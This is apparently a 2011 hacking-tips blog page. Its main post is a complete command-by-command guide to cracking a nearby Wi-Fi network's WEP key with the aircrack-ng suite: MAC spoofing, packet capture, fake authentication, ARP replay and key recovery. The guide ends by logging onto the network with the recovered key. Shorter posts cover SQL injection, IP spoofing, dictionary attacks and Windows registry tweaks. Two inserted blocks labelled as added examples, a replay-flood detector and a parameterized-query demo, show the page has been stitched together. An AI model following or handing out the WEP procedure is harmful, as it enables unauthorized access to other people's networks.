Tuesday, June 28, 2011

Crack a Wi-Fi Network’s WEP Password

Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise.

What You'll Need

Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

  • A compatible wireless adapter—This is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter.

  • A BackTrack 3 Live CD. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. (I tried the BackTrack 4 pre-release, and it didn't work as well as BT3. Do yourself a favor and stick with BackTrack 3 for now.)
  • A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.
  • Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands.
First run the following to get a list of your network interfaces:
airmon-ng
The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface).
Now, run the following four commands.

airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)


Now it's time to pick your network. Run:
airodump-ng (interface)
This shows a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH). Obviously the network you want to crack should have WEP encryption (in the ENC column), not WPA or anything else.



Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). 


Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets.  Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your crack.

Depending on the power of your network, this process could take some time. Wait until that #Data goes over 10k, though—because the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension.
If you didn't get enough data, aircrack will fail and tell you to try again with more.
The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.
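
From the network owner's side, the steps above leave a recognisable trace: one station, here using the address 00:11:22:33:44:55, suddenly sends a flood of frames that all have the same length. The following sketch is an added example, not part of the original post; the "timestamp MAC length" record format, the thresholds and the sample data are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

PLACEHOLDER_MACS = {"00:11:22:33:44:55"}  # the spoofed address used in the post
WINDOW_S = 1.0        # assumed window length in seconds
MIN_FRAMES = 200      # assumed threshold: frames per window from one station
MIN_SAME_SIZE = 0.9   # assumed share of frames with one identical length

def parse(lines):
    """Yield (timestamp, mac, length) from 'ts mac length' lines; skip malformed ones."""
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            yield float(parts[0]), parts[1].lower(), int(parts[2])
        except ValueError:
            continue

def detect(lines):
    """Return {mac: set of reasons} for stations that look like replay sources."""
    buckets = defaultdict(Counter)   # (mac, window index) -> Counter of frame lengths
    alerts = defaultdict(set)
    for ts, mac, length in parse(lines):
        if mac in PLACEHOLDER_MACS:
            alerts[mac].add("placeholder-mac")
        buckets[(mac, int(ts // WINDOW_S))][length] += 1
    for (mac, _window), sizes in buckets.items():
        total = sum(sizes.values())
        top = sizes.most_common(1)[0][1]
        if total >= MIN_FRAMES and top / total >= MIN_SAME_SIZE:
            alerts[mac].add("same-size-flood")
    return dict(alerts)

def constructed_sample():
    """Constructed data: one ordinary client, one station replaying a single frame."""
    lines = [f"{i * 0.05:.2f} a4:5e:60:aa:bb:cc {200 + (i * 37) % 1200}"
             for i in range(100)]
    lines += [f"{2 + i * 0.002:.3f} 00:11:22:33:44:55 68" for i in range(400)]
    lines.append("malformed line")   # the parser must skip this
    return lines

if __name__ == "__main__":
    for mac, reasons in detect(constructed_sample()).items():
        print(mac, sorted(reasons))
```

An alert like this is a prompt to retire WEP on that network rather than a fix in itself, since the captured traffic is what the final step works from.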






 

 



Saturday, June 25, 2011

Appear Invisible on Facebook

To start with, once you login to your Facebook account, click on the Friends link on the left panel.
There you will find an option to Edit your friends. Just click on that link. Now, you would be required to create a list just by clicking on Create List. And once you create a list, add as many friends to it as you want.
The reason behind creating this list is that it lets you make yourself invisible to the whole list at once. Now, click on your Facebook chat box. There, you will be able to find that newly created list. You can make yourself invisible to that list by clicking on the green colored button labelled Go Offline.
This is as simple as that. This is how you can stay invisible on Facebook Chat.

Tuesday, June 21, 2011

Multiple Yahoo Messenger in One PC !! :)


For people who manage multiple accounts at the same time (yes I mean you – the one with a separate account for your work stuff, family stuff and naughty stuff), the time has come for you to use ALL your accounts at the same time!


Behold the simplest method that you can use to enable you to log in simultaneously with your multiple Yahoo accounts! See the video I have attached or follow the simple hack that needs 5 steps.



  1. Click on Start Menu
  2. Click Run
  3. Type “regedit” without the quotes, press Enter
  4. Navigate to and expand the following in the said order: HKEY_CURRENT_USER/Software/Yahoo/pager/Test
  5. Right-click on Test and create a new DWORD value (32 bit).
  6. Rename that value as “Plural” without the quotes.
  7. Set the value of “Plural” to 1.
It's done!!
Now close the registry editor, restart Yahoo Messenger and try Multiple Login :)

Sunday, June 19, 2011

SQL Injection Attacks

These attacks occur when the hacker uses specially crafted SQL queries or commands to execute malicious activities on the victim system. This weakness exists when there is no validation of input when a database query is made via the Internet. The worst thing is that SQL attacks, like most other input validation attacks, can be executed easily through a browser. Most Web sites on the Net rely heavily on the safety of their online database information. Naturally, any breach in their security would lead to damage in the form of financial loss, customer dissatisfaction, possible lawsuits, and so on.

Obviously, the first step for a SQL injection attack is to find a vulnerable target. Attackers would be on the alert for online forms, such as login prompts, search enquiries, guest books, feedback forms, and so on, through which users submit data to the remote system. Another potential target would be any reference to dynamic pages or scripts, like ASP, PHP, CGI, and their like. The following HTML code is a vulnerable target for a SQL injection attack because it lets the user submit information and also refers to an ASP file:
<form action="script/login.asp" method="post" name="LoginForm">
<input type="text" name="username" value="username">
<input type="password" name="password" value="password">
</form>

Uncovering illegitimate records, bypassing security features and carrying out malicious code on the remote victim system are all possible for an attacker who has located a vulnerable SQL server. The most common examples of SQL injection attacks are examined in the following sections. It should always be kept in mind, however, that there are many more such attacks.
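
To make the "no validation of input" weakness concrete, here is an added example (not from the original post) that puts a login check built by string concatenation beside the same check using bound parameters. The table, the account row, the function names and the crafted input are constructed for illustration, and an in-memory SQLite database stands in for the server behind login.asp.

```python
import sqlite3

CRAFTED = "' OR '1'='1"   # constructed test input containing SQL syntax

def make_db():
    """In-memory database with one constructed account.
    Plaintext passwords keep the example short; real systems store salted hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable: the form fields are pasted into the SQL text itself."""
    sql = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_parameterized(db, username, password):
    """Hardened: values are bound as parameters and are never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0

def breaks_on_apostrophe(db):
    """A legitimate name with an apostrophe is enough to break the concatenated query."""
    try:
        login_concatenated(db, "o'brien", "x")
    except sqlite3.OperationalError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("concatenated, crafted input :", login_concatenated(db, "alice", CRAFTED))
    print("parameterized, crafted input:", login_parameterized(db, "alice", CRAFTED))
    print("concatenated breaks on o'brien:", breaks_on_apostrophe(db))
```

With the concatenated query the crafted input is accepted as a valid login, while the parameterized query treats it as an ordinary wrong password.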

Friday, June 17, 2011

What is an IP address?

In the real world, everyone has an individual home address or telephone number to enable easy access. Similarly, all computers connected to the Internet are given a unique Internet Protocol or IP address that can be used to contact that particular computer. In geek language, an IP address is written in a decimal notation that divides a 32-bit Internet address into four 8-bit fields.

  

Tuesday, June 14, 2011

IP Spoofing

IP Spoofing is probably the ultimate trick or attack that an attacker can execute on the target system. Almost all wannabe computer experts dream of being able to spoof their IP address and fool the target system into establishing illegitimate connections. If successfully executed, IP spoofing is definitely one of the most smooth and classic attacks on the Internet. However, IP spoofing attacks are quite complex and very few attackers have actually been able to spoof their identity successfully. IP Spoofing is a process wherein an attacker fools or tricks the target system into believing that the data packets being sent actually originated on a system other than the real source system. In other words, IP spoofing is a technique that allows an attacker to change or disguise his real identity while communicating with the target system. In this technique, the data packets that the attacker sends to the system will seem to originate at some other arbitrary system.

Sunday, June 12, 2011

Dictionary Attacks (Password Cracking Attack)

Dictionary attacks are an example of a hit and trial password-cracking technique that is commonly used by attackers. In this password-cracking technique, the attacker uses an automatic tool that tries all words that appear in the dictionary as the victim's password. As soon as a particular word matches the victim's password, the automated tool displays it on the screen. In other words, all dictionary words are tried as the password and if a word matches, it is then displayed on the screen as the password of the victim. One of the biggest problems with this type of attack is that it takes up a lot of system resources and is relatively slow. Moreover, this password cracking technique is rendered useless if the victim's password is not a word that appears in the dictionary.

Friday, June 10, 2011

Locking CD-ROM Drives

(For Windows 2000, XP and NT)
Similar to the above example, it is also possible to lock access to the CD-ROM drive by the following steps:
  1. Open the regedit.exe file.
  2. Search for the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
  3. Create a new string entry named AllocateCDRoms and set its data value to 1 to ensure that only the local logged on user can access the CD-ROM drive. On the other hand, if the string entry's data value is set to 0 then all restrictions are lifted.
  4. Exit the Windows registry. You might have to restart the Windows session for the changes to come into effect.

It is also possible to implement the above by simply creating and executing a file with a .reg extension containing the following data:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AllocateCDRoms"="1"



